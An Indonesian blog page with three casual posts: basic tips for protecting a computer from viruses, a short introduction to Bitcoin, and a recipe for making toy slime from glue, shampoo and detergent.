Virus Komputer adalah merupakan suatu program pada komputer yang dapat menggandakan atau menyalin dirinya sendiri kemudian menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lainnya. Virus Komputer sendiri dapat dianalogikan dengan Virus biologi yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup pada manusia maupun hewan. Virus komputer ini dapat merusak segala sesuatu misalnya dengan merusak data pada dokumen kita yang sangat penting, lalu membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali pada komputer kita.

lalu bagaimanakah cara kita untuk mengatasinya donk ?

Adapun cara yang dapat anda lakukan adalah :
  1. Pertama adalah anda jangan lupa untuk mengunduh aplikasi Antivirus terpercaya yang sedang naik daun seperti Avira, Smadav, Eset NOD, dan lain sebagainya.
  2. Jangan menekan tombol dari orang tidak kita kenal, maksud dari ini adalah link, aplikasi, ataupun yang lainnya. karena virus paling pertama dan banyak menyebar melalui email dengan memberi gambar berisi virus maupun link aplikasi virus. masih mending virus ! kalau data anda diambil oleh penyebar virus ??
  3. Namun apabila anda mendownload aplikasi dari sumber yang anda percaya anda dapat mengecek kembali apakah file itu benar-benar aman atau tidak, karena se-terpercaya percaya nya website adalah mereka juga mendapatkan dari orang lain. pernahkan anda berfikir. pernahkah anda berfikir demikian ? maka dari itu untuk memilahnya saya sarankan anda untuk memeriksa file yang telah anda download dari website terpercaya anda ke : http://www.virustotal.com
  4. Meskipun demikian tak jarang juga kita berhati-hati namun ada seseorang atau teman yang kita kenal pinjam alat elektronik kepada anda. saya menyarankan simpan data penting ke suatu penyimpanan aman anda. karena bisa juga virus itu tersebar oleh flashdisk teman anda dan aplikasinya ataupun ia tak berhati-dalam meminjam dengan cara dia klik sana klik sini dan alhasil virus masuk.
  5. Saya menyarankan untuk tidak mengupgrade Path pada Operating System anda. Sebenarnya path digunakan untuk menutupi kekurangan Operasi System agar berjalan dengan baik buka sebagai pemproteksi ya sobat. dan apabila RAM dan IC anda tidak memenuhi syarat dari Upgrade tersebut maka setelah anda mengupgrade akan terasa lemot. karena system dianggap sudah mampu berjalan tanpa kekurangan. seperti kakek-kakek berjiwa muda dan saat dia merasa di dalam hatinya bersemangat namun fisiknya renta.
  6. Selalu cek pada penyimpanan anda baik ekternal, internal maupun penyimpanan system dengan antivirus dan membuang file yang dianggap bukan penting.
dengan begitu komputer anda awet meski bukan kelas tinggi.
namun anda dapat menggunakan dengan pintar, cermat, baik dan bijaksana.

apabila artikel saya anda rasa dapat membantu permasalahan anda saya harap anda dapat membagikan kepada teman-teman sobat.
siapa tahu teman anda tak mengetahui tips diatas tersebut.
untuk dapat mengikuti terus agar tak ketinggalan tips dan trik terbaru maupun info dari saya, anda dapat mensubscribe dengan menggunakan email dibawah ini.
saya akan berusaha memberikan yang terbaik agar semua orang terpecahkan apabila mempunyai masalah, betul tidak ?


TERIMAKASIH

Read more

Saturday, May 20, 2017

Apa Itu Bitcoin?

Apa Itu Bitcoin?



Hai sobat,
adakah yang terlintas pada benak kalian mengenai salah satu uang ini ?
ini adalah uang termahal di dunia.
selain teraman karena menggunakan jaringan tak sederhana, namun caranya yang mudah dan sangat cepat dan terlebih lagi tanpa dikenakan potongan biaya pengiriman atau bulanan layaknya bank sentral.
dan wallet atau dompet tak perlu besar dan terbuat dari kulit ataupun kartu yang dibawa kemana-mana namun ini menggunakan teknologi yang di katakan canggih sekali. anda dimanapun kalau anda membawa handphone atau laptop maka anda dapat bertransaksi ataupun menyimpannya.
dan kelebihan lainnya adalah tanpa batas transaksi dan tanpa batas maksimal isi dompet online Bitcoin anda. Sangat mengagumkan bukan ?
Namun dibalik kelebihan pada dunia ini tersimpanlah kekurangan.
dimana ini uang tidak ada yang mengendalikan , jadi resiko pada pengguna maka tidak ada yang dapat bertanggung jawab.
maka jika anda pengguna bitcoin harap berhati-hati pada setiap transaksi anda.

oke, langsung saja penjelasan saya.

Apa Itu Bitcoin?
Definisi yang paling sederhana dari Bitcoin adalah “Mata Uang Virtual”. Lengkapnya, Bitcoin merupakan mata uang virtual yang hanya ada dalam bentuk digital saja. Ia tidak diatur ataupun dipengaruhi oleh regulasi pemerintah ataupun lembaga keuangan manapun didunia ini. Kalau begitu, maka Bitcoin walaupun berfungsi sebagai alat pembayaran, ia tidak mempunyai wujud fisik seperti lembaran uang kertas ataupun koin yang ada di dompet Anda sekarang ini. Tapi fungsinya sama, sebagai alat pembayaran. Bitcoin juga dapat untuk diuangkan ke dalam mata uang resmi/konvensional.

Dalam perannya di proses jual beli, Bitcoin dapat menjadi alternatif yang menawarkan sejumlah kemudahan dan keuntungan. Menggunakan Bitcoin setiap pihak dapat merahasiakan privasi data-data yang dimiliki setiap melakukan pembayaran. Konsumen tidak perlu lagi menginformasikan data pribadi dan data keuangan setiap kali melakukan transaksi online.


mungkin itulah yang dapat saya sampaikan,
untuk sejarah, cara kerja, dan lain sebagainya akan saya bahas dalam sesi yang akan datang.
apabila artikel saya bermanfaat untuk anda dan anda merasa terbantu maka share ini untuk memberitahu sobat lainnya yang belum tahu. saling membantu itu menyenangkan.
Subscribe untuk terus mengikuti trik dan tips terbaru dari saya




TERIMAKASIH
Read more

Cara Membuat Slime Dengan Lem

Cara Membuat Slime Dengan Lem




Pengertian, Kegunaan, dan Cara Membuat SLIME - Sekarang ini, SLIME adalah sebuah mainan yang sedang menjadi trend yang populer pada kalangan anak-anak, bahkan juga remaja di Indonesia. Slime ini sebenarnya sudah lebih dahulu populer pada tahun 2012, namun sudah benar-benar populer pada akhir tahun 2015 dan awal tahun 2016 yang lalu.

Dulu SLIME ini biasa disebut Mainan “Lumpur Lapindo” dan biasanya yang menjual adalah pedagang-pedagang mainan di beberapa sekolah di indonesia.

Nah, Untuk mengetahui lebih jauh mengenai tentang SLIME, maka pada artikel ini akan saya jelaskan mengenai pengertian, kegunaan dan juga cara membuat slime yang sangat sederhana.

Pengertian SLIME

Kata slime ini berasal dari Bahasa Inggris yang berarti Lumpur. Slime adalah sejenis mainan yang bentuknya sangat mirip dengan lumpur, lengket, terasa agak dingin, lembut dan bertekstur kenyal.

Slime ini juga biasanya dimainkan oleh anak-anak kecil bahkan sampai remaja, dimainkan seperti Plastisin/Playdought dan oleh sang pembuat dibuat menjadi berbagai macam-macam bentuk yang beraneka ragam.

Ada beberapa macam jenis daripada Slime, antara lain adalah Marsmallow Slime, Thailand Slime, Galaxy Slime, Tofu Slime dan Barrel O Slime.


Kegunaan Slime

Slime ini mempunyai beberapa kegunaan, antara lain:
  • Sebagai alat permainan anak-anak dan berfungsi untuk meningkatkan daya kreatifitasnya dalam melatih kelenturan otot jari mereka.
  • Dapat juga digunakan sebagai pembersih debu atau kotoran yang ada pada beberapa tempat yang sempit, seperti sela-sela keyboard pada laptop.
  • Menjadi salah satu bahan kesenian untuk Anda yang mempunyai jiwa seni yang tinggi. Slime juga bisa diubah menjadi berbagai bentuk-bentuk yang indah dan mempesona apabila dibuat dengan kreatif.

Cara Membuat Slime Sederhana Tanpa Borax

SLIME juga dapat dibuat dari beberapa bahan yang anda miliki, salah satunya adalah dengan menggunakan bahan dari shampoo. Dalam pembuatannya juga bisa dikatakan sangat mudah sekali serta alat bahan yang digunakan untuknya juga sangat mudah untuk didapatkan.

Berikut ini adalah cara untuk membuat Slime yang sederhana dengan menggunakan bahan shampoo dan juga lem.

Alat yang Dibutuhkan :
  • Pengaduk
  • Wadah atau Baskom kecil

Bahan yang Digunakan :
  • 1 Sachet Shampoo (soft)
  • Air secukupnya
  • 5 Sendok makan Lem fox atau Povinal (Bisa juga dengan lem lainnya yang Cair)
  • Pewarna makanan secukupnya (Warna terserah anda sesuai selera anda sendiri)
  • 1 Sendok makan detergen bubuk
  • Cusson baby
  • Bedak

Langkah Membuat Slime dari Bahan Lem

  1. Siapkan semua alat dan juga bahan yang dibutuhkan tersebut.
  2. Kemudian masukkan Lem fox atau Lem Povinal sebanyak kurang lebih 1 sendok makan kedalam sebuah wadah atau baskom kecil.
  3. Lalu masukkan shampoo dan juga detergen ke dalam wadah baskom tersebut.
  4. Masukkan pewarna makanan atau sumba. Warna yang digunakan sesuai selera dan keinginan anda, bisa warna hijau, biru, kuning dan juga lain-lain.
  5. Kemudian aduk hingga semua bahan tercampur dengan rata dan sedikit mengental.
  6. Apabila Slime belum juga terasa mengental ataupun bentuknya masih belum begitu bagus, maka Anda dapat menambahkan sedikit bubuk detergen lagi.
  7. Apabila Slime anda sudah terasa sedikit mengental, maka rendamlah slime andra tersebut kedalam air bersih selama kurang lebih 4 menit.
  8. Jika Slime tadi yang anda rendam terasa masih sangat lengket, maka teruslah tekan-tekan Slime anda sampai terasa begitu padat dan juga mengental. Apabila terasa lengket yang berlebihan, anda bisa mengatasinya dengan cara menambahkan bubuk bedak, tepung ataupun minyak telon bayi pada Slime.
  9. Jika terasa sudah mengental dan tidak terasa lengket, berarti slime anda sudah jadi.


Mudah bukan sobat caranya?
apabila sobat merasa artikel ini menarik jangan lupa komentar dan juga share.
untuk sobat yang ingin mendapatkan info tips dan trik terbaru, sobat bisa Subscribe yang terletak dibawah artikel ini.


TERIMAKASIH



Artikel Terkait :

cara membuat slime dengan lem
cara membuat slime dengan lem fox
cara membuat slime dengan lem povinal
cara membuat slime dengan lem kertas
cara membuat slime dengan lem kertas cair
cara membuat slime dengan lem kayu
cara membuat slime dengan lem rajawali
cara membuat slime dengan lem air
cara membuat slime dengan lem bening
cara membuat slime dengan lem cair
cara membuat slime dengan lem dlukol
cara membuat slime dengan lem takol
cara membuat slime dengan lem hanakol
cara membuat slime dengan lem inikol
cara membuat slime dengan lem uhu
cara membuat slime dengan lem tanpa borax
Read more